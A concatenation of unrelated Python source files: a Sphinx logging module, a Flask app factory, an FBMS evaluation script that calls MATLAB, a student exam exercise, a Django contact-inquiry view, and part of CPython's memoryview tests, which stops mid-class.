if 'location' in kwargs:
extra['location'] = kwargs.pop('location')
if 'nonl' in kwargs:
extra['nonl'] = kwargs.pop('nonl')
if 'color' in kwargs:
extra['color'] = kwargs.pop('color')
return msg, kwargs
def handle(self, record):
# type: (logging.LogRecord) -> None
self.logger.handle(record) # type: ignore
class WarningStreamHandler(logging.StreamHandler):
"""StreamHandler for warnings."""
pass
class NewLineStreamHandlerPY2(logging.StreamHandler):
"""StreamHandler which switches line terminator by record.nonl flag."""
def emit(self, record):
# type: (logging.LogRecord) -> None
try:
self.acquire()
stream = self.stream # type: ignore
if getattr(record, 'nonl', False):
                # remove the return code forcibly when nonl=True
self.stream = StringIO()
super(NewLineStreamHandlerPY2, self).emit(record)
stream.write(self.stream.getvalue()[:-1])
stream.flush()
else:
super(NewLineStreamHandlerPY2, self).emit(record)
finally:
self.stream = stream
self.release()
class NewLineStreamHandlerPY3(logging.StreamHandler):
"""StreamHandler which switches line terminator by record.nonl flag."""
def emit(self, record):
# type: (logging.LogRecord) -> None
try:
self.acquire()
if getattr(record, 'nonl', False):
# skip appending terminator when nonl=True
self.terminator = ''
super(NewLineStreamHandlerPY3, self).emit(record)
finally:
self.terminator = '\n'
self.release()
if PY2:
NewLineStreamHandler = NewLineStreamHandlerPY2
else:
NewLineStreamHandler = NewLineStreamHandlerPY3
class MemoryHandler(logging.handlers.BufferingHandler):
"""Handler buffering all logs."""
def __init__(self):
# type: () -> None
super(MemoryHandler, self).__init__(-1)
def shouldFlush(self, record):
# type: (logging.LogRecord) -> bool
return False # never flush
def flushTo(self, logger):
# type: (logging.Logger) -> None
self.acquire()
try:
for record in self.buffer:
logger.handle(record)
self.buffer = [] # type: List[logging.LogRecord]
finally:
self.release()
def clear(self):
# type: () -> List[logging.LogRecord]
buffer, self.buffer = self.buffer, []
return buffer
@contextmanager
def pending_warnings():
# type: () -> Generator
"""contextmanager to pend logging warnings temporary."""
logger = logging.getLogger()
memhandler = MemoryHandler()
memhandler.setLevel(logging.WARNING)
try:
handlers = []
for handler in logger.handlers[:]:
if isinstance(handler, WarningStreamHandler):
logger.removeHandler(handler)
handlers.append(handler)
logger.addHandler(memhandler)
yield memhandler
finally:
logger.removeHandler(memhandler)
for handler in handlers:
logger.addHandler(handler)
memhandler.flushTo(logger)
@contextmanager
def pending_logging():
# type: () -> Generator
"""contextmanager to pend logging all logs temporary."""
logger = logging.getLogger()
memhandler = MemoryHandler()
try:
handlers = []
for handler in logger.handlers[:]:
logger.removeHandler(handler)
handlers.append(handler)
logger.addHandler(memhandler)
yield memhandler
finally:
logger.removeHandler(memhandler)
for handler in handlers:
logger.addHandler(handler)
memhandler.flushTo(logger)
@contextmanager
def skip_warningiserror(skip=True):
# type: (bool) -> Generator
"""contextmanager to skip WarningIsErrorFilter for a while."""
logger = logging.getLogger()
if skip is False:
yield
else:
try:
disabler = DisableWarningIsErrorFilter()
for handler in logger.handlers:
# use internal method; filters.insert() directly to install disabler
# before WarningIsErrorFilter
handler.filters.insert(0, disabler)
yield
finally:
for handler in logger.handlers:
handler.removeFilter(disabler)
class LogCollector(object):
def __init__(self):
# type: () -> None
self.logs = [] # type: List[logging.LogRecord]
@contextmanager
def collect(self):
# type: () -> Generator
with pending_logging() as memhandler:
yield
self.logs = memhandler.clear()
class InfoFilter(logging.Filter):
"""Filter error and warning messages."""
def filter(self, record):
# type: (logging.LogRecord) -> bool
if record.levelno < logging.WARNING:
return True
else:
return False
def is_suppressed_warning(type, subtype, suppress_warnings):
# type: (unicode, unicode, List[unicode]) -> bool
"""Check the warning is suppressed or not."""
if type is None:
return False
for warning_type in suppress_warnings:
if '.' in warning_type:
target, subtarget = warning_type.split('.', 1)
else:
target, subtarget = warning_type, None
if target == type:
if (subtype is None or subtarget is None or
subtarget == subtype or subtarget == '*'):
return True
return False
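# Worked examples for the matching rules above:
#   is_suppressed_warning('ref', 'python', ['ref.python'])  -> True
#   is_suppressed_warning('ref', 'numpy', ['ref.python'])   -> False
#   is_suppressed_warning('ref', 'numpy', ['ref'])          -> True  (no subtarget)
#   is_suppressed_warning('ref', 'numpy', ['ref.*'])        -> True  (wildcard)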
class WarningSuppressor(logging.Filter):
"""Filter logs by `suppress_warnings`."""
def __init__(self, app):
# type: (Sphinx) -> None
self.app = app
super(WarningSuppressor, self).__init__()
def filter(self, record):
# type: (logging.LogRecord) -> bool
type = getattr(record, 'type', None)
subtype = getattr(record, 'subtype', None)
try:
suppress_warnings = self.app.config.suppress_warnings
except AttributeError:
# config is not initialized yet (ex. in conf.py)
suppress_warnings = []
if is_suppressed_warning(type, subtype, suppress_warnings):
return False
else:
self.app._warncount += 1
return True
class WarningIsErrorFilter(logging.Filter):
"""Raise exception if warning emitted."""
def __init__(self, app):
# type: (Sphinx) -> None
self.app = app
super(WarningIsErrorFilter, self).__init__()
def filter(self, record):
# type: (logging.LogRecord) -> bool
if getattr(record, 'skip_warningsiserror', False):
# disabled by DisableWarningIsErrorFilter
return True
elif self.app.warningiserror:
location = getattr(record, 'location', '')
if location:
raise SphinxWarning(location + ":" + record.msg % record.args)
else:
raise SphinxWarning(record.msg % record.args)
else:
return True
class DisableWarningIsErrorFilter(logging.Filter):
"""Disable WarningIsErrorFilter if this filter installed."""
def filter(self, record):
# type: (logging.LogRecord) -> bool
record.skip_warningsiserror = True # type: ignore
return True
class WarningLogRecordTranslator(logging.Filter):
"""Converts a log record to one Sphinx expects
    * Make an instance of SphinxWarningLogRecord
* docname to path if location given
"""
def __init__(self, app):
# type: (Sphinx) -> None
self.app = app
super(WarningLogRecordTranslator, self).__init__()
def filter(self, record): # type: ignore
# type: (SphinxWarningLogRecord) -> bool
if isinstance(record, logging.LogRecord):
record.__class__ = SphinxWarningLogRecord # force subclassing to handle location
location = getattr(record, 'location', None)
if isinstance(location, tuple):
docname, lineno = location
if docname and lineno:
record.location = '%s:%s' % (self.app.env.doc2path(docname), lineno)
elif docname:
record.location = '%s' % self.app.env.doc2path(docname)
else:
record.location = None
elif isinstance(location, nodes.Node):
(source, line) = get_source_line(location)
if source and line:
record.location = "%s:%s" % (source, line)
elif source:
record.location = "%s:" % source
elif line:
record.location = "<unknown>:%s" % line
else:
record.location = None
elif location and ':' not in location:
record.location = '%s' % self.app.env.doc2path(location)
return True
class ColorizeFormatter(logging.Formatter):
def format(self, record):
# type: (logging.LogRecord) -> str
message = super(ColorizeFormatter, self).format(record)
color = getattr(record, 'color', None)
if color is None:
color = COLOR_MAP.get(record.levelno)
if color:
return colorize(color, message) # type: ignore
else:
return message
class SafeEncodingWriter(object):
"""Stream writer which ignores UnicodeEncodeError silently"""
def __init__(self, stream):
# type: (IO) -> None
self.stream = stream
self.encoding = getattr(stream, 'encoding', 'ascii') or 'ascii'
def write(self, data):
# type: (unicode) -> None
try:
self.stream.write(data)
except UnicodeEncodeError:
# stream accept only str, not bytes. So, we encode and replace
# non-encodable characters, then decode them.
self.stream.write(data.encode(self.encoding, 'replace').decode(self.encoding))
def flush(self):
# type: () -> None
if hasattr(self.stream, 'flush'):
self.stream.flush()
class LastMessagesWriter(object):
"""Stream writer which memories last 10 messages to save trackback"""
def __init__(self, app, stream):
# type: (Sphinx, IO) -> None
self.app = app
def write(self, data):
# type: (unicode) -> None
self.app.messagelog.append(data)
def setup(app, status, warning):
# type: (Sphinx, IO, IO) -> None
"""Setup root logger for Sphinx"""
logger = logging.getLogger()
logger.setLevel(logging.NOTSET)
# clear all handlers
for handler in logger.handlers[:]:
logger.removeHandler(handler)
info_handler = NewLineStreamHandler(SafeEncodingWriter(status)) # type: ignore
info_handler.addFilter(InfoFilter())
info_handler.setLevel(VERBOSITY_MAP[app.verbosity])
info_handler.setFormatter(ColorizeFormatter())
warning_handler = WarningStreamHandler(SafeEncodingWriter(warning)) # type: ignore
warning_handler.addFilter(WarningSuppressor(app))
warning_handler.addFilter(WarningLogRecordTranslator(app))
warning_handler.addFilter(WarningIsErrorFilter(app))
warning_handler.setLevel(logging.WARNING)
warning_handler.setFormatter(ColorizeFormatter())
messagelog_handler = logging.StreamHandler(LastMessagesWriter(app, status)) # type: ignore
messagelog_handler.addFilter(InfoFilter())
messagelog_handler.setLevel(VERBOSITY_MAP[app.verbosity])
messagelog_handler.setFormatter(ColorizeFormatter())
logger.addHandler(info_handler)
logger.addHandler(warning_handler)
logger.addHandler(messagelog_handler)
|
the-stack_106_19013
|
from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_cors import CORS
from werkzeug.routing import BaseConverter, ValidationError
from werkzeug.exceptions import BadRequest
db = SQLAlchemy()
migrate = Migrate()
class YearSession:
def __init__(self, year, session):
self.year = year # type:str
self.session = session # type:str
def __repr__(self):
return self.year + self.session
class YearSessionConverter(BaseConverter):
"""Converts yearsessions for flask URLs."""
def to_python(self, value):
"""Called to convert a `value` to its python equivalent.
"""
# Anytime an invalid value is provided, raise ValidationError. Flask
# will catch this, and continue searching the other routes. First,
# check that value is an integer, if not there is no way it could be
# a user.
if len(value) < 5:
raise BadRequest()
year = value[0:4]
session = value[4]
try:
int(year)
except ValueError:
raise BadRequest()
if session not in {'W', 'S'}:
raise BadRequest()
return YearSession(year, session)
def to_url(self, value):
# Convert the yearsession to string
return str(value)
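# Hypothetical route usage: once the converter is registered in create_app()
# below, URL rules can declare yearsession parameters, e.g.
#
#   @bp.route('/sections/<yearsession:ys>')
#   def sections(ys):
#       return f"{ys.year}{ys.session}"
#
# so "/sections/2019W" yields YearSession("2019", "W"), while a malformed value
# such as "19X" is rejected with a 400 Bad Request.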
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(config_class)
app.url_map.converters['yearsession'] = YearSessionConverter
db.init_app(app)
migrate.init_app(app, db)
# Main webpage
from app.main import bp as main_bp
app.register_blueprint(main_bp)
# Import API
from app.api import bp as api_bp
app.register_blueprint(api_bp)
CORS(app)
return app, db
from app import models
|
the-stack_106_19014
|
import argparse
import logging
import subprocess
from pathlib import Path
import utils.log as log_utils
if __name__ == "__main__":
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--masks-dir', type=Path, required=True)
parser.add_argument(
'--fbms-dir',
required=True,
type=Path)
parser.add_argument(
'--eval-code-dir',
type=Path,
default='/home/achald/research/misc/datasets/fbms/fgbg-eval-pavel/')
parser.add_argument('--matlab-binary', type=Path, default='matlab')
args = parser.parse_args()
output_log_file = log_utils.add_time_to_path(
args.masks_dir / (Path(__file__).name + '.log'))
log_utils.setup_logging(output_log_file)
for split in ['TrainingSet', 'TestSet']:
try:
command = [
                str(args.matlab_binary), '-nodesktop', '-nosplash', '-r',
(f"evaluateAllSeqs('{args.fbms_dir}', '{args.masks_dir}', "
f"{{'{split}'}}); quit")
]
logging.info(f'Command:\n{" ".join(command)}')
            output = subprocess.run(
                command,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                check=True,
                cwd=args.eval_code_dir)
except subprocess.CalledProcessError as e:
logging.fatal('Failed command.\nException: %s\nOutput:\n %s',
e.returncode, e.output.decode('utf-8'))
raise
logging.info(f'{split} accuracy:')
logging.info(output.stdout.decode('utf-8'))
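# Hypothetical invocation (the script name depends on how this file is saved;
# --eval-code-dir and --matlab-binary fall back to the defaults defined above):
#
#   python evaluate_fbms.py --masks-dir /path/to/masks --fbms-dir /path/to/FBMS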
|
the-stack_106_19015
|
"""
Exam 3, problem 5.
Authors: Vibha Alangar, Aaron Wilkin, David Mutchler, Dave Fisher,
Matt Boutell, Amanda Stouder, their colleagues and
Matt Hummel. January 2019.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
import time
import testing_helper
def main():
""" Calls the TEST functions in this module. """
run_test_problem5()
###############################################################################
# DONE: 2. READ the doc-string for the is_prime function defined below.
# It is the same as you have seen before.
# After you UNDERSTAND the doc-string (JUST the doc-string, NOT the code),
# ASKING QUESTIONS AS NEEDED, change the above _TODO_ to DONE.
###############################################################################
def is_prime(n):
"""
What comes in: An integer n.
What goes out:
-- Returns True if the given integer is prime,
False if the given integer is NOT prime.
Treats integers less than 2 as NOT prime.
Side effects: None.
Examples:
-- is_prime(11) returns True
-- is_prime(12) returns False
-- is_prime(2) returns True
-- is_prime(1) returns False
Note: The algorithm used here is simple and clear but slow.
"""
if n < 2:
return False
for k in range(2, (n // 2) + 1):
if n % k == 0:
return False
return True
# ------------------------------------------------------------------
# Students:
# Do NOT touch the above is_prime function - it has no TO DO.
# Do NOT copy code from this function.
#
# Instead, ** CALL ** this function as needed in the problems below.
# ------------------------------------------------------------------
def run_test_problem5():
""" Tests the problem5 function. """
####################################################################
# THESE TESTS ARE ALREADY DONE. DO NOT CHANGE THEM.
####################################################################
print()
print('--------------------------------------------------')
print('Testing the problem5 function:')
print('--------------------------------------------------')
format_string = ' problem5( {} )'
test_results = [0, 0] # Number of tests passed, failed.
# Test 1:
sequence = [[1,3,2], [10, 5], []]
expected = [3, 10]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 2:
sequence = [[10, 12], (23, 1)]
expected = [12, 23]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 3:
sequence = [(4, 25),
(33, 54, 20, 55, 10),
(6, 11, 70, 33),
(7, 11),
(),
(5, 5, 3)
]
expected = [25, 55, 70, 11, 5]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 4:
sequence = ([1], [], [2, 5])
expected = [1, 5]
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# Test 5:
sequence = ([], [], [])
expected = []
print_expected_result_of_test([sequence], expected,
test_results, format_string)
actual = problem5(sequence) # Run the code to test
print_actual_result_of_test(expected, actual, test_results)
# SUMMARY of the test results:
print_summary_of_test_results(test_results)
def problem5(seq_of_seq):
"""
What comes in:
-- A sequence of sub-sequences of integers.
What goes out:
      -- Returns a NEW list containing the largest integer of each sub-sequence.
         If one of the original sub-sequences is empty, it has no largest number,
         so it contributes no integer to the returned list.
Side effects: None.
Examples:
problem5([(4, 25),
(33, 54, 20, 55, 10),
(6, 11, 70, 33),
(7, 11),
(),
(5, 5, 3)
])
returns [25, 55, 70, 11, 5]
problem5( [[10, 12], (23, 1)] ) returns [12, 23]
      problem5( ([1], [], [2, 5]) ) returns [1, 5]
      problem5( ([], [], []) ) returns []
      problem5( [[1, 3, 2], [10, 5], []] ) returns [3, 10]
Type hints:
:type seq_of_seq: list of list of int
:rtype: (list of int) | int
"""
# -------------------------------------------------------------------------
# DONE: 2. Implement and test this function.
# Tests have been written for you (above).
# -------------------------------------------------------------------------
nlist = []
for k in range(len(seq_of_seq)):
maxj = 0
for j in range(len(seq_of_seq[k])):
if(seq_of_seq[k][j]>seq_of_seq[k][maxj]):
maxj = j
if(len(seq_of_seq[k])>0):
nlist += [seq_of_seq[k][maxj]]
return nlist
###############################################################################
# Our tests use the following to print error messages in red.
# Do NOT change it. You do NOT have to do anything with it.
###############################################################################
def print_expected_result_of_test(arguments, expected,
test_results, format_string):
testing_helper.print_expected_result_of_test(arguments, expected,
test_results,
format_string)
def print_actual_result_of_test(expected, actual, test_results):
testing_helper.print_actual_result_of_test(expected, actual,
test_results)
def print_summary_of_test_results(test_results):
testing_helper.print_summary_of_test_results(test_results)
# To allow color-coding the output to the console:
USE_COLORING = True # Change to False to revert to OLD style coloring
testing_helper.USE_COLORING = USE_COLORING
if USE_COLORING:
# noinspection PyShadowingBuiltins
print = testing_helper.print_colored
else:
# noinspection PyShadowingBuiltins
print = testing_helper.print_uncolored
# -----------------------------------------------------------------------------
# Calls main to start the ball rolling.
# The try .. except prevents error messages on the console from being
# intermingled with ordinary output to the console.
# -----------------------------------------------------------------------------
try:
main()
except Exception:
print('ERROR - While running this test,', color='red')
print('your code raised the following exception:', color='red')
print()
time.sleep(1)
raise
|
the-stack_106_19017
|
from django.shortcuts import render, redirect
from django.contrib import messages
from django.core.mail import send_mail
from .models import Contact
def contact(request):
if request.method == 'POST':
listing_id = request.POST['listing_id']
listing = request.POST['listing']
name = request.POST['name']
email = request.POST['email']
phone = request.POST['phone']
message = request.POST['message']
user_id = request.POST['user_id']
realtor_email = request.POST['realtor_email']
# Check if user has made inquiry already
if request.user.is_authenticated:
user_id = request.user.id
            has_contacted = Contact.objects.all().filter(listing_id=listing_id, user_id=user_id)
if has_contacted:
messages.error(request, 'You have already made an inquiry for this listing')
return redirect('/listings/'+listing_id)
contact = Contact(listing=listing, listing_id=listing_id, name=name, email=email, phone=phone, message=message, user_id=user_id)
contact.save()
# Send Mail
send_mail(
'Property Listing Inquiry',
'There has been an inquiry for ' + listing + '. Sign into the panel for more info.',
'[email protected]',
[realtor_email],
fail_silently=False
)
messages.success(request, 'Your request has been submitted, a realtor will get back to you soon')
return redirect('/listings/'+listing_id)
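# Note (assumption about the surrounding project): send_mail() needs an email
# backend configured in the Django settings (SMTP credentials, or the console
# backend during development); with fail_silently=False a failing backend raises,
# so the inquiry is saved but the success message is never reached.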
|
the-stack_106_19018
|
"""Unit tests for the memoryview
Some tests are in test_bytes. Many tests that require _testbuffer.ndarray
are in test_buffer.
"""
import unittest
import test.support
import sys
import gc
import weakref
import array
import io
import copy
import pickle
from test.support import check_impl_detail
try:
getrefcount = sys.getrefcount
except AttributeError:
# PyPy
getrefcount = lambda o: len(gc.get_referents(o))
class AbstractMemoryTests:
source_bytes = b"abcdef"
@property
def _source(self):
return self.source_bytes
@property
def _types(self):
return filter(None, [self.ro_type, self.rw_type])
def check_getitem_with_type(self, tp):
b = tp(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
self.assertEqual(m[0], ord(b"a"))
self.assertIsInstance(m[0], int)
self.assertEqual(m[5], ord(b"f"))
self.assertEqual(m[-1], ord(b"f"))
self.assertEqual(m[-6], ord(b"a"))
# Bounds checking
self.assertRaises(IndexError, lambda: m[6])
self.assertRaises(IndexError, lambda: m[-7])
self.assertRaises(IndexError, lambda: m[sys.maxsize])
self.assertRaises(IndexError, lambda: m[-sys.maxsize])
# Type checking
self.assertRaises(TypeError, lambda: m[None])
self.assertRaises(TypeError, lambda: m[0.0])
self.assertRaises(TypeError, lambda: m["a"])
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_getitem(self):
for tp in self._types:
self.check_getitem_with_type(tp)
def test_iter(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
self.assertEqual(list(m), [m[i] for i in range(len(m))])
def test_setitem_readonly(self):
if not self.ro_type:
self.skipTest("no read-only type to test")
b = self.ro_type(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
def setitem(value):
m[0] = value
self.assertRaises(TypeError, setitem, b"a")
self.assertRaises(TypeError, setitem, 65)
self.assertRaises(TypeError, setitem, memoryview(b"a"))
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_setitem_writable(self):
if not self.rw_type:
self.skipTest("no writable type to test")
tp = self.rw_type
b = self.rw_type(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
m[0] = ord(b'1')
self._check_contents(tp, b, b"1bcdef")
m[0:1] = tp(b"0")
self._check_contents(tp, b, b"0bcdef")
m[1:3] = tp(b"12")
self._check_contents(tp, b, b"012def")
m[1:1] = tp(b"")
self._check_contents(tp, b, b"012def")
m[:] = tp(b"abcdef")
self._check_contents(tp, b, b"abcdef")
# Overlapping copies of a view into itself
m[0:3] = m[2:5]
self._check_contents(tp, b, b"cdedef")
m[:] = tp(b"abcdef")
m[2:5] = m[0:3]
self._check_contents(tp, b, b"ababcf")
def setitem(key, value):
m[key] = tp(value)
# Bounds checking
self.assertRaises(IndexError, setitem, 6, b"a")
self.assertRaises(IndexError, setitem, -7, b"a")
self.assertRaises(IndexError, setitem, sys.maxsize, b"a")
self.assertRaises(IndexError, setitem, -sys.maxsize, b"a")
# Wrong index/slice types
self.assertRaises(TypeError, setitem, 0.0, b"a")
if check_impl_detail():
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, (slice(0,1,1), 0), b"a")
self.assertRaises(TypeError, setitem, (0, slice(0,1,1)), b"a")
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, "a", b"a")
# Not implemented: multidimensional slices
slices = (slice(0,1,1), slice(0,1,2))
self.assertRaises(NotImplementedError, setitem, slices, b"a")
# Trying to resize the memory object
exc = ValueError if m.format == 'c' else TypeError
self.assertRaises(exc, setitem, 0, b"")
self.assertRaises(exc, setitem, 0, b"ab")
self.assertRaises(ValueError, setitem, slice(1,1), b"a")
self.assertRaises(ValueError, setitem, slice(0,2), b"a")
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_delitem(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with self.assertRaises(TypeError):
del m[1]
with self.assertRaises(TypeError):
del m[1:4]
def test_tobytes(self):
for tp in self._types:
m = self._view(tp(self._source))
b = m.tobytes()
# This calls self.getitem_type() on each separate byte of b"abcdef"
expected = b"".join(
self.getitem_type(bytes([c])) for c in b"abcdef")
self.assertEqual(b, expected)
self.assertIsInstance(b, bytes)
def test_tolist(self):
for tp in self._types:
m = self._view(tp(self._source))
l = m.tolist()
self.assertEqual(l, list(b"abcdef"))
def test_compare(self):
# memoryviews can compare for equality with other objects
# having the buffer interface.
for tp in self._types:
m = self._view(tp(self._source))
for tp_comp in self._types:
self.assertTrue(m == tp_comp(b"abcdef"))
self.assertFalse(m != tp_comp(b"abcdef"))
self.assertFalse(m == tp_comp(b"abcde"))
self.assertTrue(m != tp_comp(b"abcde"))
self.assertFalse(m == tp_comp(b"abcde1"))
self.assertTrue(m != tp_comp(b"abcde1"))
self.assertTrue(m == m)
self.assertTrue(m == m[:])
self.assertTrue(m[0:6] == m[:])
self.assertFalse(m[0:5] == m)
# Comparison with objects which don't support the buffer API
self.assertFalse(m == "abcdef")
self.assertTrue(m != "abcdef")
self.assertFalse("abcdef" == m)
self.assertTrue("abcdef" != m)
# Unordered comparisons
for c in (m, b"abcdef"):
self.assertRaises(TypeError, lambda: m < c)
self.assertRaises(TypeError, lambda: c <= m)
self.assertRaises(TypeError, lambda: m >= c)
self.assertRaises(TypeError, lambda: c > m)
def check_attributes_with_type(self, tp):
m = self._view(tp(self._source))
self.assertEqual(m.format, self.format)
self.assertEqual(m.itemsize, self.itemsize)
self.assertEqual(m.ndim, 1)
self.assertEqual(m.shape, (6,))
self.assertEqual(len(m), 6)
self.assertEqual(m.strides, (self.itemsize,))
self.assertEqual(m.suboffsets, ())
return m
def test_attributes_readonly(self):
if not self.ro_type:
self.skipTest("no read-only type to test")
m = self.check_attributes_with_type(self.ro_type)
self.assertEqual(m.readonly, True)
def test_attributes_writable(self):
if not self.rw_type:
self.skipTest("no writable type to test")
m = self.check_attributes_with_type(self.rw_type)
self.assertEqual(m.readonly, False)
def test_getbuffer(self):
# Test PyObject_GetBuffer() on a memoryview object.
for tp in self._types:
b = tp(self._source)
oldrefcount = getrefcount(b)
m = self._view(b)
oldviewrefcount = getrefcount(m)
s = str(m, "utf-8")
self._check_contents(tp, b, s.encode("utf-8"))
self.assertEqual(getrefcount(m), oldviewrefcount)
m = None
self.assertEqual(getrefcount(b), oldrefcount)
def test_gc(self):
for tp in self._types:
if not isinstance(tp, type):
# If tp is a factory rather than a plain type, skip
continue
class MyView():
def __init__(self, base):
self.m = memoryview(base)
class MySource(tp):
pass
class MyObject:
pass
# Create a reference cycle through a memoryview object.
# This exercises mbuf_clear().
b = MySource(tp(b'abc'))
m = self._view(b)
o = MyObject()
b.m = m
b.o = o
wr = weakref.ref(o)
b = m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
# This exercises memory_clear().
m = MyView(tp(b'abc'))
o = MyObject()
m.x = m
m.o = o
wr = weakref.ref(o)
m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
def _check_released(self, m, tp):
check = self.assertRaisesRegex(ValueError, "released")
with check: bytes(m)
with check: m.tobytes()
with check: m.tolist()
with check: m[0]
with check: m[0] = b'x'
with check: len(m)
with check: m.format
with check: m.itemsize
with check: m.ndim
with check: m.readonly
with check: m.shape
with check: m.strides
with check:
with m:
pass
# str() and repr() still function
self.assertIn("released memory", str(m))
self.assertIn("released memory", repr(m))
self.assertEqual(m, m)
self.assertNotEqual(m, memoryview(tp(self._source)))
self.assertNotEqual(m, tp(self._source))
def test_contextmanager(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with m as cm:
self.assertIs(cm, m)
self._check_released(m, tp)
m = self._view(b)
# Can release explicitly inside the context manager
with m:
m.release()
def test_release(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
m.release()
self._check_released(m, tp)
# Can be called a second time (it's a no-op)
m.release()
self._check_released(m, tp)
def test_writable_readonly(self):
# Issue #10451: memoryview incorrectly exposes a readonly
# buffer as writable causing a segfault if using mmap
tp = self.ro_type
if tp is None:
self.skipTest("no read-only type to test")
b = tp(self._source)
m = self._view(b)
i = io.BytesIO(b'ZZZZ')
self.assertRaises(TypeError, i.readinto, m)
def test_getbuf_fail(self):
self.assertRaises(TypeError, self._view, {})
def test_hash(self):
# Memoryviews of readonly (hashable) types are hashable, and they
# hash as hash(obj.tobytes()).
tp = self.ro_type
if tp is None:
self.skipTest("no read-only type to test")
b = tp(self._source)
m = self._view(b)
self.assertEqual(hash(m), hash(b"abcdef"))
# Releasing the memoryview keeps the stored hash value (as with weakrefs)
m.release()
self.assertEqual(hash(m), hash(b"abcdef"))
# Hashing a memoryview for the first time after it is released
# results in an error (as with weakrefs).
m = self._view(b)
m.release()
self.assertRaises(ValueError, hash, m)
def test_hash_writable(self):
# Memoryviews of writable types are unhashable
tp = self.rw_type
if tp is None:
self.skipTest("no writable type to test")
b = tp(self._source)
m = self._view(b)
self.assertRaises(ValueError, hash, m)
def test_weakref(self):
# Check memoryviews are weakrefable
for tp in self._types:
b = tp(self._source)
m = self._view(b)
L = []
def callback(wr, b=b):
L.append(b)
wr = weakref.ref(m, callback)
self.assertIs(wr(), m)
del m
test.support.gc_collect()
self.assertIs(wr(), None)
self.assertIs(L[0], b)
def test_reversed(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
aslist = list(reversed(m.tolist()))
self.assertEqual(list(reversed(m)), aslist)
self.assertEqual(list(reversed(m)), list(m[::-1]))
def test_toreadonly(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
mm = m.toreadonly()
self.assertTrue(mm.readonly)
self.assertTrue(memoryview(mm).readonly)
self.assertEqual(mm.tolist(), m.tolist())
mm.release()
m.tolist()
def test_issue22668(self):
a = array.array('H', [256, 256, 256, 256])
x = memoryview(a)
m = x.cast('B')
b = m.cast('H')
c = b[0:2]
d = memoryview(b)
del b
self.assertEqual(c[0], 256)
self.assertEqual(d[0], 256)
self.assertEqual(c.format, "H")
self.assertEqual(d.format, "H")
_ = m.cast('I')
self.assertEqual(c[0], 256)
self.assertEqual(d[0], 256)
self.assertEqual(c.format, "H")
self.assertEqual(d.format, "H")
# Variations on source objects for the buffer: bytes-like objects, then arrays
# with itemsize > 1.
# NOTE: support for multi-dimensional objects is unimplemented.
class BaseBytesMemoryTests(AbstractMemoryTests):
ro_type = bytes
rw_type = bytearray
getitem_type = bytes
itemsize = 1
format = 'B'
class BaseArrayMemoryTests(AbstractMemoryTests):
ro_type = None
rw_type = lambda self, b: array.array('i', list(b))
getitem_type = lambda self, b: array.array('i', list(b)).tobytes()
itemsize = array.array('i').itemsize
format = 'i'
@unittest.skip('XXX test should be adapted for non-byte buffers')
def test_getbuffer(self):
pass
@unittest.skip('XXX NotImplementedError: tolist() only supports byte views')
def test_tolist(self):
pass
# Variations on indirection levels: memoryview, slice of memoryview,
# slice of slice of memoryview.
# This is important to test allocation subtleties.
class BaseMemoryviewTests:
def _view(self, obj):
return memoryview(obj)
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj, tp(contents))
class BaseMemorySliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[1:7]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
def test_refs(self):
for tp in self._types:
m = memoryview(tp(self._source))
oldrefcount = getrefcount(m)
m[1:2]
self.assertEqual(getrefcount(m), oldrefcount)
class BaseMemorySliceSliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[:7][1:]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
# Concrete test classes
class BytesMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseBytesMemoryTests):
def test_constructor(self):
for tp in self._types:
ob = tp(self._source)
self.assertTrue(memoryview(ob))
self.assertTrue(memoryview(object=ob))
self.assertRaises(TypeError, memoryview)
self.assertRaises(TypeError, memoryview, ob, ob)
self.assertRaises(TypeError, memoryview, argument=ob)
self.assertRaises(TypeError, memoryview, ob, argument=True)
class ArrayMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseArrayMemoryTests):
def test_array_assign(self):
# Issue #4569: segfault when mutating a memoryview with itemsize != 1
a = array.array('i', range(10))
m = memoryview(a)
new_a = array.array('i', range(9, -1, -1))
m[:] = new_a
self.assertEqual(a, new_a)
class BytesMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceTest(unittest.TestCase,
